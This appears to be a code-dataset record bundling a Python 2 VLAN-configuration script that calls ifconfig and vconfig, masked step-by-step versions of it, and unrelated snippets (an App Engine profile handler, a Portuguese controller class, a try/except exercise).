status, output = commands.getstatusoutput('ifconfig %s up' %
config_interface[i])
if status == 0:
getLogger('main').info('ifconfig %s up OK' %
config_interface[i])
config_interface = ' '.join(config_interface)
vlan_port = configured_port[0]
brgport = getBridgeInfo()
for i in range(len(vlan_port)):
if vlan_port[i] not in config_interface:
if vlan_port[i] not in brgport:
status, output = commands.getstatusoutput('vconfig rem %s' %
vlan_port[i])
if status == 0:
getLogger('main').info('vconfig rem %s ok' % vlan_port[i])
if __name__ == '__main__':
VlanConfig()
<|reserved_special_token_1|>
#! /usr/bin/env python
# -*- conding:utf-8 -*-
import MySQLdb
import os
import commands
from common import logger_init
from logging import getLogger
import re
from db import VlanInfo,Session,WafBridge
def getVlan(): # get vlan data from t_vlan
session=Session()
vlanport=[]
for info in session.query(VlanInfo):
a=[]
a.append(info.nets)
a.append(info.vlan_id)
vlanport.append(a)
interface=[]
for i in range(len(vlanport)):
nic=vlanport[i]
a=nic[0].split(',')
interface.append( a[0]+'.'+nic[1])
interface.append(a[1]+'.'+nic[1])
return interface
def getBridgeInfo(): #get data from t_bridge
session=Session()
brgport=[]
for info in session.query(WafBridge.nics):
info=list(tuple(info))
info=''.join(info)
brgport.append(info)
brgport=' '.join(brgport)
return brgport
def getSysInterface(): #Gets the configured interface
info=os.popen('ifconfig').read()
f=open('ifconfig_info.txt','w')
print >>f,info
f.close()
match=re.compile(r'(.+?)\s*?Link')
f=open('ifconfig_info.txt','r')
interface=[]
for line in f:
if 'Link encap' in line:
info=match.match(line).groups()
interface.append(info)
f.close()
b=[]
for i in range(len(interface)):
a=list(tuple(interface[i]))
a=''.join(a)
b.append(a)
strinfo=' '.join(b)
listinfo=strinfo.split()
port=[]
nic=[]
for i in range(len(listinfo)):
if '.'in listinfo[i]:
port.append(listinfo[i])
else:
nic.append(listinfo[i])
all_port=[]
all_port.append(port)
all_port.append(nic)
return all_port
def VlanConfig(): #config vlan(add and delete)
logger_init('main','log/vlanconfig.log','INFO')
config_interface=getVlan()
configured_port=getSysInterface()
vlan_port=' '.join(configured_port[0])
configured_nic=' '.join(configured_port[1])
for i in range(len(config_interface)):
if config_interface[i] in vlan_port:
continue
else:
a=config_interface[i].split('.')
if a[0] not in configured_nic:
(status,output)=commands.getstatusoutput('ifconfig %s up'%a[0])
if status!=0:
return
(status,output)=commands.getstatusoutput('vconfig add %s %s'%(a[0],a[1]))
getLogger('main').info(output)
(status,output)=commands.getstatusoutput('ifconfig %s up'%config_interface[i])
if status==0:
getLogger('main').info('ifconfig %s up OK'%config_interface[i])
config_interface=' '.join(config_interface)
vlan_port=configured_port[0]
brgport=getBridgeInfo()
for i in range(len(vlan_port)):
if vlan_port[i] not in config_interface:
if vlan_port[i] not in brgport:
(status,output)=commands.getstatusoutput('vconfig rem %s'%vlan_port[i])
if status==0:
getLogger('main').info('vconfig rem %s ok'%vlan_port[i])
if __name__=='__main__':
VlanConfig()
# getVlan()
# getSysInterface()
# getBridgeInfo()
|
flexible
|
{
"blob_id": "cd564ebb51cf91993d2ed1810707aead44c19a6b",
"index": 6959,
"step-1": "<mask token>\n\n\ndef getVlan():\n session = Session()\n vlanport = []\n for info in session.query(VlanInfo):\n a = []\n a.append(info.nets)\n a.append(info.vlan_id)\n vlanport.append(a)\n interface = []\n for i in range(len(vlanport)):\n nic = vlanport[i]\n a = nic[0].split(',')\n interface.append(a[0] + '.' + nic[1])\n interface.append(a[1] + '.' + nic[1])\n return interface\n\n\ndef getBridgeInfo():\n session = Session()\n brgport = []\n for info in session.query(WafBridge.nics):\n info = list(tuple(info))\n info = ''.join(info)\n brgport.append(info)\n brgport = ' '.join(brgport)\n return brgport\n\n\n<mask token>\n\n\ndef VlanConfig():\n logger_init('main', 'log/vlanconfig.log', 'INFO')\n config_interface = getVlan()\n configured_port = getSysInterface()\n vlan_port = ' '.join(configured_port[0])\n configured_nic = ' '.join(configured_port[1])\n for i in range(len(config_interface)):\n if config_interface[i] in vlan_port:\n continue\n else:\n a = config_interface[i].split('.')\n if a[0] not in configured_nic:\n status, output = commands.getstatusoutput('ifconfig %s up' %\n a[0])\n if status != 0:\n return\n status, output = commands.getstatusoutput('vconfig add %s %s' %\n (a[0], a[1]))\n getLogger('main').info(output)\n status, output = commands.getstatusoutput('ifconfig %s up' %\n config_interface[i])\n if status == 0:\n getLogger('main').info('ifconfig %s up OK' %\n config_interface[i])\n config_interface = ' '.join(config_interface)\n vlan_port = configured_port[0]\n brgport = getBridgeInfo()\n for i in range(len(vlan_port)):\n if vlan_port[i] not in config_interface:\n if vlan_port[i] not in brgport:\n status, output = commands.getstatusoutput('vconfig rem %s' %\n vlan_port[i])\n if status == 0:\n getLogger('main').info('vconfig rem %s ok' % vlan_port[i])\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef getVlan():\n session = Session()\n vlanport = []\n for info in session.query(VlanInfo):\n a = []\n a.append(info.nets)\n a.append(info.vlan_id)\n vlanport.append(a)\n interface = []\n for i in range(len(vlanport)):\n nic = vlanport[i]\n a = nic[0].split(',')\n interface.append(a[0] + '.' + nic[1])\n interface.append(a[1] + '.' + nic[1])\n return interface\n\n\ndef getBridgeInfo():\n session = Session()\n brgport = []\n for info in session.query(WafBridge.nics):\n info = list(tuple(info))\n info = ''.join(info)\n brgport.append(info)\n brgport = ' '.join(brgport)\n return brgport\n\n\ndef getSysInterface():\n info = os.popen('ifconfig').read()\n f = open('ifconfig_info.txt', 'w')\n print >> f, info\n f.close()\n match = re.compile('(.+?)\\\\s*?Link')\n f = open('ifconfig_info.txt', 'r')\n interface = []\n for line in f:\n if 'Link encap' in line:\n info = match.match(line).groups()\n interface.append(info)\n f.close()\n b = []\n for i in range(len(interface)):\n a = list(tuple(interface[i]))\n a = ''.join(a)\n b.append(a)\n strinfo = ' '.join(b)\n listinfo = strinfo.split()\n port = []\n nic = []\n for i in range(len(listinfo)):\n if '.' 
in listinfo[i]:\n port.append(listinfo[i])\n else:\n nic.append(listinfo[i])\n all_port = []\n all_port.append(port)\n all_port.append(nic)\n return all_port\n\n\ndef VlanConfig():\n logger_init('main', 'log/vlanconfig.log', 'INFO')\n config_interface = getVlan()\n configured_port = getSysInterface()\n vlan_port = ' '.join(configured_port[0])\n configured_nic = ' '.join(configured_port[1])\n for i in range(len(config_interface)):\n if config_interface[i] in vlan_port:\n continue\n else:\n a = config_interface[i].split('.')\n if a[0] not in configured_nic:\n status, output = commands.getstatusoutput('ifconfig %s up' %\n a[0])\n if status != 0:\n return\n status, output = commands.getstatusoutput('vconfig add %s %s' %\n (a[0], a[1]))\n getLogger('main').info(output)\n status, output = commands.getstatusoutput('ifconfig %s up' %\n config_interface[i])\n if status == 0:\n getLogger('main').info('ifconfig %s up OK' %\n config_interface[i])\n config_interface = ' '.join(config_interface)\n vlan_port = configured_port[0]\n brgport = getBridgeInfo()\n for i in range(len(vlan_port)):\n if vlan_port[i] not in config_interface:\n if vlan_port[i] not in brgport:\n status, output = commands.getstatusoutput('vconfig rem %s' %\n vlan_port[i])\n if status == 0:\n getLogger('main').info('vconfig rem %s ok' % vlan_port[i])\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef getVlan():\n session = Session()\n vlanport = []\n for info in session.query(VlanInfo):\n a = []\n a.append(info.nets)\n a.append(info.vlan_id)\n vlanport.append(a)\n interface = []\n for i in range(len(vlanport)):\n nic = vlanport[i]\n a = nic[0].split(',')\n interface.append(a[0] + '.' + nic[1])\n interface.append(a[1] + '.' + nic[1])\n return interface\n\n\ndef getBridgeInfo():\n session = Session()\n brgport = []\n for info in session.query(WafBridge.nics):\n info = list(tuple(info))\n info = ''.join(info)\n brgport.append(info)\n brgport = ' '.join(brgport)\n return brgport\n\n\ndef getSysInterface():\n info = os.popen('ifconfig').read()\n f = open('ifconfig_info.txt', 'w')\n print >> f, info\n f.close()\n match = re.compile('(.+?)\\\\s*?Link')\n f = open('ifconfig_info.txt', 'r')\n interface = []\n for line in f:\n if 'Link encap' in line:\n info = match.match(line).groups()\n interface.append(info)\n f.close()\n b = []\n for i in range(len(interface)):\n a = list(tuple(interface[i]))\n a = ''.join(a)\n b.append(a)\n strinfo = ' '.join(b)\n listinfo = strinfo.split()\n port = []\n nic = []\n for i in range(len(listinfo)):\n if '.' 
in listinfo[i]:\n port.append(listinfo[i])\n else:\n nic.append(listinfo[i])\n all_port = []\n all_port.append(port)\n all_port.append(nic)\n return all_port\n\n\ndef VlanConfig():\n logger_init('main', 'log/vlanconfig.log', 'INFO')\n config_interface = getVlan()\n configured_port = getSysInterface()\n vlan_port = ' '.join(configured_port[0])\n configured_nic = ' '.join(configured_port[1])\n for i in range(len(config_interface)):\n if config_interface[i] in vlan_port:\n continue\n else:\n a = config_interface[i].split('.')\n if a[0] not in configured_nic:\n status, output = commands.getstatusoutput('ifconfig %s up' %\n a[0])\n if status != 0:\n return\n status, output = commands.getstatusoutput('vconfig add %s %s' %\n (a[0], a[1]))\n getLogger('main').info(output)\n status, output = commands.getstatusoutput('ifconfig %s up' %\n config_interface[i])\n if status == 0:\n getLogger('main').info('ifconfig %s up OK' %\n config_interface[i])\n config_interface = ' '.join(config_interface)\n vlan_port = configured_port[0]\n brgport = getBridgeInfo()\n for i in range(len(vlan_port)):\n if vlan_port[i] not in config_interface:\n if vlan_port[i] not in brgport:\n status, output = commands.getstatusoutput('vconfig rem %s' %\n vlan_port[i])\n if status == 0:\n getLogger('main').info('vconfig rem %s ok' % vlan_port[i])\n\n\nif __name__ == '__main__':\n VlanConfig()\n",
"step-4": "import MySQLdb\nimport os\nimport commands\nfrom common import logger_init\nfrom logging import getLogger\nimport re\nfrom db import VlanInfo, Session, WafBridge\n\n\ndef getVlan():\n session = Session()\n vlanport = []\n for info in session.query(VlanInfo):\n a = []\n a.append(info.nets)\n a.append(info.vlan_id)\n vlanport.append(a)\n interface = []\n for i in range(len(vlanport)):\n nic = vlanport[i]\n a = nic[0].split(',')\n interface.append(a[0] + '.' + nic[1])\n interface.append(a[1] + '.' + nic[1])\n return interface\n\n\ndef getBridgeInfo():\n session = Session()\n brgport = []\n for info in session.query(WafBridge.nics):\n info = list(tuple(info))\n info = ''.join(info)\n brgport.append(info)\n brgport = ' '.join(brgport)\n return brgport\n\n\ndef getSysInterface():\n info = os.popen('ifconfig').read()\n f = open('ifconfig_info.txt', 'w')\n print >> f, info\n f.close()\n match = re.compile('(.+?)\\\\s*?Link')\n f = open('ifconfig_info.txt', 'r')\n interface = []\n for line in f:\n if 'Link encap' in line:\n info = match.match(line).groups()\n interface.append(info)\n f.close()\n b = []\n for i in range(len(interface)):\n a = list(tuple(interface[i]))\n a = ''.join(a)\n b.append(a)\n strinfo = ' '.join(b)\n listinfo = strinfo.split()\n port = []\n nic = []\n for i in range(len(listinfo)):\n if '.' 
in listinfo[i]:\n port.append(listinfo[i])\n else:\n nic.append(listinfo[i])\n all_port = []\n all_port.append(port)\n all_port.append(nic)\n return all_port\n\n\ndef VlanConfig():\n logger_init('main', 'log/vlanconfig.log', 'INFO')\n config_interface = getVlan()\n configured_port = getSysInterface()\n vlan_port = ' '.join(configured_port[0])\n configured_nic = ' '.join(configured_port[1])\n for i in range(len(config_interface)):\n if config_interface[i] in vlan_port:\n continue\n else:\n a = config_interface[i].split('.')\n if a[0] not in configured_nic:\n status, output = commands.getstatusoutput('ifconfig %s up' %\n a[0])\n if status != 0:\n return\n status, output = commands.getstatusoutput('vconfig add %s %s' %\n (a[0], a[1]))\n getLogger('main').info(output)\n status, output = commands.getstatusoutput('ifconfig %s up' %\n config_interface[i])\n if status == 0:\n getLogger('main').info('ifconfig %s up OK' %\n config_interface[i])\n config_interface = ' '.join(config_interface)\n vlan_port = configured_port[0]\n brgport = getBridgeInfo()\n for i in range(len(vlan_port)):\n if vlan_port[i] not in config_interface:\n if vlan_port[i] not in brgport:\n status, output = commands.getstatusoutput('vconfig rem %s' %\n vlan_port[i])\n if status == 0:\n getLogger('main').info('vconfig rem %s ok' % vlan_port[i])\n\n\nif __name__ == '__main__':\n VlanConfig()\n",
"step-5": "#! /usr/bin/env python\n# -*- conding:utf-8 -*-\nimport MySQLdb\nimport os\nimport commands\nfrom common import logger_init\nfrom logging import getLogger\nimport re\nfrom db import VlanInfo,Session,WafBridge\n\n\ndef getVlan(): # get vlan data from t_vlan\n session=Session()\n vlanport=[]\n for info in session.query(VlanInfo):\n a=[]\n a.append(info.nets)\n a.append(info.vlan_id)\n vlanport.append(a)\n interface=[]\n for i in range(len(vlanport)):\n nic=vlanport[i]\n a=nic[0].split(',')\n interface.append( a[0]+'.'+nic[1])\n interface.append(a[1]+'.'+nic[1])\n return interface\n\ndef getBridgeInfo(): #get data from t_bridge\n session=Session()\n brgport=[]\n for info in session.query(WafBridge.nics):\n info=list(tuple(info))\n info=''.join(info)\n brgport.append(info)\n brgport=' '.join(brgport)\n return brgport\n\n\ndef getSysInterface(): #Gets the configured interface\n info=os.popen('ifconfig').read()\n f=open('ifconfig_info.txt','w')\n print >>f,info\n f.close()\n match=re.compile(r'(.+?)\\s*?Link')\n f=open('ifconfig_info.txt','r')\n interface=[]\n for line in f:\n if 'Link encap' in line:\n info=match.match(line).groups()\n interface.append(info)\n f.close()\n b=[]\n for i in range(len(interface)):\n a=list(tuple(interface[i]))\n a=''.join(a)\n b.append(a)\n strinfo=' '.join(b)\n listinfo=strinfo.split()\n port=[]\n nic=[]\n for i in range(len(listinfo)):\n if '.'in listinfo[i]:\n port.append(listinfo[i])\n else:\n nic.append(listinfo[i])\n all_port=[]\n all_port.append(port)\n all_port.append(nic)\n return all_port\n\n\n\ndef VlanConfig(): #config vlan(add and delete)\n logger_init('main','log/vlanconfig.log','INFO')\n config_interface=getVlan()\n configured_port=getSysInterface()\n vlan_port=' '.join(configured_port[0])\n configured_nic=' '.join(configured_port[1])\n for i in range(len(config_interface)):\n if config_interface[i] in vlan_port:\n continue\n else:\n a=config_interface[i].split('.')\n if a[0] not in configured_nic:\n 
(status,output)=commands.getstatusoutput('ifconfig %s up'%a[0])\n if status!=0:\n return\n (status,output)=commands.getstatusoutput('vconfig add %s %s'%(a[0],a[1]))\n getLogger('main').info(output)\n (status,output)=commands.getstatusoutput('ifconfig %s up'%config_interface[i])\n if status==0:\n getLogger('main').info('ifconfig %s up OK'%config_interface[i])\n config_interface=' '.join(config_interface)\n vlan_port=configured_port[0]\n brgport=getBridgeInfo()\n for i in range(len(vlan_port)):\n if vlan_port[i] not in config_interface:\n if vlan_port[i] not in brgport:\n (status,output)=commands.getstatusoutput('vconfig rem %s'%vlan_port[i])\n if status==0:\n getLogger('main').info('vconfig rem %s ok'%vlan_port[i])\n\n\nif __name__=='__main__':\n VlanConfig()\n# getVlan()\n# getSysInterface()\n# getBridgeInfo()\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
from google.appengine.api import users
from google.appengine.ext import ndb
from datetime import datetime
from datetime import timedelta
import os
import logging
import webapp2
import jinja2
# Module-wide Jinja2 environment: templates are loaded relative to this
# file's directory, with autoescaping enabled so rendered values are
# HTML-escaped by default.
JINJA_ENVIRONMENT = jinja2.Environment(
    loader=jinja2.FileSystemLoader(os.path.dirname(__file__)),
    extensions=['jinja2.ext.autoescape'],
    autoescape=True)
class UserProfile(ndb.Model):
    """Models the profile (JSON) of an individual user.

    The entity id is the user's email address (see
    UserProfileHandler.post, which constructs it with id=user.email()).
    """
    # Opaque profile payload stored as text (JSON per the class docstring).
    profile = ndb.TextProperty()
    # Creation timestamp; set automatically on the first put().
    date = ndb.DateTimeProperty(auto_now_add=True)
    @classmethod
    def query_profile(cls, ancestor_key):
        # Return the first UserProfile entity under the given ancestor key,
        # or None when no such entity exists.
        return cls.query(ancestor=ancestor_key).get()
class UserProfileHandler(webapp2.RequestHandler):
    """Serves the /profile page: GET renders a profile, POST stores one."""

    def get(self):
        """Render the profile page for the requested (or current) user."""
        template = JINJA_ENVIRONMENT.get_template('templates/profile.html')
        the_user = self.request.get('user')
        logging.info("The user = " + the_user)
        # No ?user= parameter means the visitor is viewing their own page.
        owner = the_user == ""
        if owner:
            the_user = users.get_current_user().email()
        user_profile_data = UserProfile.get_by_id(the_user)
        template_values = {'owner': owner, 'user': the_user}
        if user_profile_data:
            template_values['profile_data'] = user_profile_data.profile
        logging.info(user_profile_data)
        self.response.out.write(template.render(template_values))

    def post(self):
        """Persist the submitted profile data, then redirect to /profile."""
        user = users.get_current_user()
        profile_data = self.request.get('profile_data')
        # Keyed by email so get() above can look the entity up by id.
        UserProfile(id=user.email(), profile=profile_data).put()
        self.redirect('/profile')
# WSGI application: routes /profile to UserProfileHandler.
app = webapp2.WSGIApplication([
    ('/profile', UserProfileHandler),
], debug=True)
|
normal
|
{
"blob_id": "309090167c2218c89494ce17f7a25bd89320a202",
"index": 3855,
"step-1": "<mask token>\n\n\nclass UserProfile(ndb.Model):\n <mask token>\n <mask token>\n <mask token>\n\n @classmethod\n def query_profile(cls, ancestor_key):\n return cls.query(ancestor=ancestor_key).get()\n\n\nclass UserProfileHandler(webapp2.RequestHandler):\n\n def get(self):\n template = JINJA_ENVIRONMENT.get_template('templates/profile.html')\n the_user = self.request.get('user')\n logging.info('The user = ' + the_user)\n if the_user == '':\n the_user = users.get_current_user().email()\n owner = True\n else:\n owner = False\n user_profile_data = UserProfile.get_by_id(the_user)\n template_values = {'owner': owner, 'user': the_user}\n if user_profile_data:\n template_values['profile_data'] = user_profile_data.profile\n logging.info(user_profile_data)\n self.response.out.write(template.render(template_values))\n\n def post(self):\n user = users.get_current_user()\n profile_data = self.request.get('profile_data')\n user_profile = UserProfile(id=user.email(), profile=profile_data)\n user_profile.put()\n self.redirect('/profile')\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass UserProfile(ndb.Model):\n \"\"\"Models the profile (JSON) of an individual user.\"\"\"\n profile = ndb.TextProperty()\n date = ndb.DateTimeProperty(auto_now_add=True)\n\n @classmethod\n def query_profile(cls, ancestor_key):\n return cls.query(ancestor=ancestor_key).get()\n\n\nclass UserProfileHandler(webapp2.RequestHandler):\n\n def get(self):\n template = JINJA_ENVIRONMENT.get_template('templates/profile.html')\n the_user = self.request.get('user')\n logging.info('The user = ' + the_user)\n if the_user == '':\n the_user = users.get_current_user().email()\n owner = True\n else:\n owner = False\n user_profile_data = UserProfile.get_by_id(the_user)\n template_values = {'owner': owner, 'user': the_user}\n if user_profile_data:\n template_values['profile_data'] = user_profile_data.profile\n logging.info(user_profile_data)\n self.response.out.write(template.render(template_values))\n\n def post(self):\n user = users.get_current_user()\n profile_data = self.request.get('profile_data')\n user_profile = UserProfile(id=user.email(), profile=profile_data)\n user_profile.put()\n self.redirect('/profile')\n\n\n<mask token>\n",
"step-3": "<mask token>\nJINJA_ENVIRONMENT = jinja2.Environment(loader=jinja2.FileSystemLoader(os.\n path.dirname(__file__)), extensions=['jinja2.ext.autoescape'],\n autoescape=True)\n\n\nclass UserProfile(ndb.Model):\n \"\"\"Models the profile (JSON) of an individual user.\"\"\"\n profile = ndb.TextProperty()\n date = ndb.DateTimeProperty(auto_now_add=True)\n\n @classmethod\n def query_profile(cls, ancestor_key):\n return cls.query(ancestor=ancestor_key).get()\n\n\nclass UserProfileHandler(webapp2.RequestHandler):\n\n def get(self):\n template = JINJA_ENVIRONMENT.get_template('templates/profile.html')\n the_user = self.request.get('user')\n logging.info('The user = ' + the_user)\n if the_user == '':\n the_user = users.get_current_user().email()\n owner = True\n else:\n owner = False\n user_profile_data = UserProfile.get_by_id(the_user)\n template_values = {'owner': owner, 'user': the_user}\n if user_profile_data:\n template_values['profile_data'] = user_profile_data.profile\n logging.info(user_profile_data)\n self.response.out.write(template.render(template_values))\n\n def post(self):\n user = users.get_current_user()\n profile_data = self.request.get('profile_data')\n user_profile = UserProfile(id=user.email(), profile=profile_data)\n user_profile.put()\n self.redirect('/profile')\n\n\napp = webapp2.WSGIApplication([('/profile', UserProfileHandler)], debug=True)\n",
"step-4": "from google.appengine.api import users\nfrom google.appengine.ext import ndb\nfrom datetime import datetime\nfrom datetime import timedelta\nimport os\nimport logging\nimport webapp2\nimport jinja2\nJINJA_ENVIRONMENT = jinja2.Environment(loader=jinja2.FileSystemLoader(os.\n path.dirname(__file__)), extensions=['jinja2.ext.autoescape'],\n autoescape=True)\n\n\nclass UserProfile(ndb.Model):\n \"\"\"Models the profile (JSON) of an individual user.\"\"\"\n profile = ndb.TextProperty()\n date = ndb.DateTimeProperty(auto_now_add=True)\n\n @classmethod\n def query_profile(cls, ancestor_key):\n return cls.query(ancestor=ancestor_key).get()\n\n\nclass UserProfileHandler(webapp2.RequestHandler):\n\n def get(self):\n template = JINJA_ENVIRONMENT.get_template('templates/profile.html')\n the_user = self.request.get('user')\n logging.info('The user = ' + the_user)\n if the_user == '':\n the_user = users.get_current_user().email()\n owner = True\n else:\n owner = False\n user_profile_data = UserProfile.get_by_id(the_user)\n template_values = {'owner': owner, 'user': the_user}\n if user_profile_data:\n template_values['profile_data'] = user_profile_data.profile\n logging.info(user_profile_data)\n self.response.out.write(template.render(template_values))\n\n def post(self):\n user = users.get_current_user()\n profile_data = self.request.get('profile_data')\n user_profile = UserProfile(id=user.email(), profile=profile_data)\n user_profile.put()\n self.redirect('/profile')\n\n\napp = webapp2.WSGIApplication([('/profile', UserProfileHandler)], debug=True)\n",
"step-5": "from google.appengine.api import users\nfrom google.appengine.ext import ndb\nfrom datetime import datetime\nfrom datetime import timedelta\nimport os\nimport logging\n\nimport webapp2\nimport jinja2\n\nJINJA_ENVIRONMENT = jinja2.Environment(\n loader=jinja2.FileSystemLoader(os.path.dirname(__file__)),\n extensions=['jinja2.ext.autoescape'],\n autoescape=True)\n\nclass UserProfile(ndb.Model):\n \"\"\"Models the profile (JSON) of an individual user.\"\"\"\n profile = ndb.TextProperty()\n date = ndb.DateTimeProperty(auto_now_add=True)\n\n @classmethod\n def query_profile(cls, ancestor_key):\n return cls.query(ancestor=ancestor_key).get()\n\nclass UserProfileHandler(webapp2.RequestHandler):\n def get(self):\n template = JINJA_ENVIRONMENT.get_template('templates/profile.html')\n the_user = self.request.get('user')\n logging.info(\"The user = \" + the_user)\n if the_user == \"\":\n the_user = users.get_current_user().email()\n owner = True\n else:\n owner = False\n user_profile_data = UserProfile.get_by_id(the_user)\n template_values = { 'owner': owner, 'user': the_user}\n if user_profile_data:\n template_values['profile_data'] = user_profile_data.profile\n logging.info(user_profile_data)\n self.response.out.write(template.render(template_values))\n\n def post(self):\n user = users.get_current_user()\n profile_data = self.request.get('profile_data')\n user_profile = UserProfile(id=user.email(), profile=profile_data)\n user_profile.put()\n self.redirect('/profile')\n #self.response.out.write(\"Here is the JSON for your profile.\")\n #self.response.out.write(profile_data)\n\napp = webapp2.WSGIApplication([\n ('/profile', UserProfileHandler),\n], debug=True)\n",
"step-ids": [
5,
7,
8,
9,
10
]
}
|
[
5,
7,
8,
9,
10
] |
<|reserved_special_token_0|>
class ControllerSC:
<|reserved_special_token_0|>
<|reserved_special_token_0|>
@staticmethod
def entrarSC(login, senha):
resultado = Usuario.entrar(login, senha)
return resultado
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class ControllerSC:
<|reserved_special_token_0|>
def __init__(self):
pass
@staticmethod
def entrarSC(login, senha):
resultado = Usuario.entrar(login, senha)
return resultado
@staticmethod
def cadastrarSC(usuario):
Usuario.adicionar(usuario)
@staticmethod
def criarPlaylist(dicioPlaylist):
musicas = Playlist.criarPlaylist(dicioPlaylist)
minhasMusicas = json.dumps(musicas.encode())
return minhasMusicas
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class ControllerSC:
"""
O controlador define 2 ações:
- adicionar_pessoa: para adicionar novas pessoas no banco de
dados.
- listar_pessoas: retornar a lista das pessoas
Note que as 2 ações supracitadas utilizam a classe do Modelo para
consultar/atualizar o banco de dados
"""
def __init__(self):
pass
@staticmethod
def entrarSC(login, senha):
resultado = Usuario.entrar(login, senha)
return resultado
@staticmethod
def cadastrarSC(usuario):
Usuario.adicionar(usuario)
@staticmethod
def criarPlaylist(dicioPlaylist):
musicas = Playlist.criarPlaylist(dicioPlaylist)
minhasMusicas = json.dumps(musicas.encode())
return minhasMusicas
<|reserved_special_token_1|>
from usuarioModel import *
class ControllerSC:
"""
O controlador define 2 ações:
- adicionar_pessoa: para adicionar novas pessoas no banco de
dados.
- listar_pessoas: retornar a lista das pessoas
Note que as 2 ações supracitadas utilizam a classe do Modelo para
consultar/atualizar o banco de dados
"""
def __init__(self):
pass
@staticmethod
def entrarSC(login, senha):
resultado = Usuario.entrar(login, senha)
return resultado
@staticmethod
def cadastrarSC(usuario):
Usuario.adicionar(usuario)
@staticmethod
def criarPlaylist(dicioPlaylist):
musicas = Playlist.criarPlaylist(dicioPlaylist)
minhasMusicas = json.dumps(musicas.encode())
return minhasMusicas
<|reserved_special_token_1|>
#Classe do controlador do servidor SEEEEEEERVIDOOOOOOOOOOR
from usuarioModel import *
class ControllerSC:
    '''
    Server-side controller. Exposes three static actions:

    - entrarSC: authenticate a user by login and senha (password).
    - cadastrarSC: register a new user.
    - criarPlaylist: build a playlist and return it JSON-encoded.

    All actions delegate persistence to the model classes imported
    (via star import) from usuarioModel.
    '''
    def __init__(self):
        # Stateless controller; nothing to initialize.
        pass
    @staticmethod
    def entrarSC(login, senha):
        # Delegate the login check to the Usuario model and return its
        # result unchanged.
        resultado = Usuario.entrar(login, senha)
        return resultado
    @staticmethod
    def cadastrarSC(usuario):
        # Persist the new user via the Usuario model.
        Usuario.adicionar(usuario)
    @staticmethod
    def criarPlaylist(dicioPlaylist):
        # NOTE(review): `Playlist` and `json` are assumed to come from the
        # star import of usuarioModel — confirm they are exported there.
        musicas = Playlist.criarPlaylist(dicioPlaylist)
        # NOTE(review): json.dumps(musicas.encode()) would raise TypeError on
        # Python 3 (bytes are not JSON-serializable) — verify the intended
        # Python version / the type returned by Playlist.criarPlaylist.
        minhasMusicas = json.dumps(musicas.encode())
        return minhasMusicas
|
flexible
|
{
"blob_id": "39eecf1c7ec19f7c75721caa092c08569f53d3e5",
"index": 9449,
"step-1": "<mask token>\n\n\nclass ControllerSC:\n <mask token>\n <mask token>\n\n @staticmethod\n def entrarSC(login, senha):\n resultado = Usuario.entrar(login, senha)\n return resultado\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass ControllerSC:\n <mask token>\n\n def __init__(self):\n pass\n\n @staticmethod\n def entrarSC(login, senha):\n resultado = Usuario.entrar(login, senha)\n return resultado\n\n @staticmethod\n def cadastrarSC(usuario):\n Usuario.adicionar(usuario)\n\n @staticmethod\n def criarPlaylist(dicioPlaylist):\n musicas = Playlist.criarPlaylist(dicioPlaylist)\n minhasMusicas = json.dumps(musicas.encode())\n return minhasMusicas\n",
"step-3": "<mask token>\n\n\nclass ControllerSC:\n \"\"\"\n O controlador define 2 ações:\n - adicionar_pessoa: para adicionar novas pessoas no banco de\n dados. \n - listar_pessoas: retornar a lista das pessoas\n\n Note que as 2 ações supracitadas utilizam a classe do Modelo para\n consultar/atualizar o banco de dados\n \"\"\"\n\n def __init__(self):\n pass\n\n @staticmethod\n def entrarSC(login, senha):\n resultado = Usuario.entrar(login, senha)\n return resultado\n\n @staticmethod\n def cadastrarSC(usuario):\n Usuario.adicionar(usuario)\n\n @staticmethod\n def criarPlaylist(dicioPlaylist):\n musicas = Playlist.criarPlaylist(dicioPlaylist)\n minhasMusicas = json.dumps(musicas.encode())\n return minhasMusicas\n",
"step-4": "from usuarioModel import *\n\n\nclass ControllerSC:\n \"\"\"\n O controlador define 2 ações:\n - adicionar_pessoa: para adicionar novas pessoas no banco de\n dados. \n - listar_pessoas: retornar a lista das pessoas\n\n Note que as 2 ações supracitadas utilizam a classe do Modelo para\n consultar/atualizar o banco de dados\n \"\"\"\n\n def __init__(self):\n pass\n\n @staticmethod\n def entrarSC(login, senha):\n resultado = Usuario.entrar(login, senha)\n return resultado\n\n @staticmethod\n def cadastrarSC(usuario):\n Usuario.adicionar(usuario)\n\n @staticmethod\n def criarPlaylist(dicioPlaylist):\n musicas = Playlist.criarPlaylist(dicioPlaylist)\n minhasMusicas = json.dumps(musicas.encode())\n return minhasMusicas\n",
"step-5": "#Classe do controlador do servidor SEEEEEEERVIDOOOOOOOOOOR\n\nfrom usuarioModel import *\n\n\nclass ControllerSC:\n '''\n O controlador define 2 ações:\n - adicionar_pessoa: para adicionar novas pessoas no banco de\n dados. \n - listar_pessoas: retornar a lista das pessoas\n\n Note que as 2 ações supracitadas utilizam a classe do Modelo para\n consultar/atualizar o banco de dados\n '''\n\n def __init__(self):\n pass\n \n @staticmethod\n def entrarSC(login, senha):\n resultado = Usuario.entrar(login, senha)\n return resultado\n\n @staticmethod\n def cadastrarSC(usuario):\n Usuario.adicionar(usuario)\n\n @staticmethod\n def criarPlaylist(dicioPlaylist):\n \n musicas = Playlist.criarPlaylist(dicioPlaylist)\n minhasMusicas = json.dumps(musicas.encode())\n return minhasMusicas\n ",
"step-ids": [
2,
5,
6,
7,
8
]
}
|
[
2,
5,
6,
7,
8
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
try:
print(l)
s = len(l)
if s > 5:
raise TypeError
print(d[2])
except TypeError:
print('Error!!!length should be less than or equals to 5')
except NameError:
print('index out of range')
else:
for i in l:
print(i)
finally:
print('execution done!!!!!!')
<|reserved_special_token_1|>
l = {1, 2, 3, 4}
try:
print(l)
s = len(l)
if s > 5:
raise TypeError
print(d[2])
except TypeError:
print('Error!!!length should be less than or equals to 5')
except NameError:
print('index out of range')
else:
for i in l:
print(i)
finally:
print('execution done!!!!!!')
<|reserved_special_token_1|>
